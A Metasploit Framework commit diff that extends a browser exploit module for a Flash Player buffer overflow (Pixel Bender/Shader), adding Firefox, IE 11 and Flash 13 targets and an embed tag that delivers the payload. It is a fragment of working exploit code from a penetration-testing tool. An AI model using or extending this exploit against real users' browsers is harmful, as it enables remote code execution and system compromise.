Land #3369 @bugch3ck's support for plugin flash exploitation on adobe_flash_pixel_bender

2014-05-18 23:25:08 -05:00 · 2014-05-18 23:25:08 -05:00 · d35ba208ed
parent a97d9ed54f 975cdcb537
commit d35ba208ed
1 changed files with 7 additions and 7 deletions
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
        This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
        vulnerability occurs in the flash.Display.Shader class, when setting specially
        crafted data as its bytecode, as exploited in the wild in April 2014. This module
-        has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
-        Windows XP SP3, Windows 7 SP1 and Windows 8.
+        has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
        },
      'DefaultOptions'  =>
        {
-          'InitialAutoRunScript' => 'migrate -f',
+          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
+          #'InitialAutoRunScript' => 'migrate -f',
          'Retries'              => false,
          'EXITFUNC'             => "thread"
        },
@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
-          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          :method  => "LoadMovie",
          :os_name => Msf::OperatingSystems::WINDOWS,
-          :ua_name => Msf::HttpClients::IE,
+          :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
          :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
        },
      'Targets'        =>
@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote

    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=flash_payload%>" />
    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
    </object>
    </body>
    </html>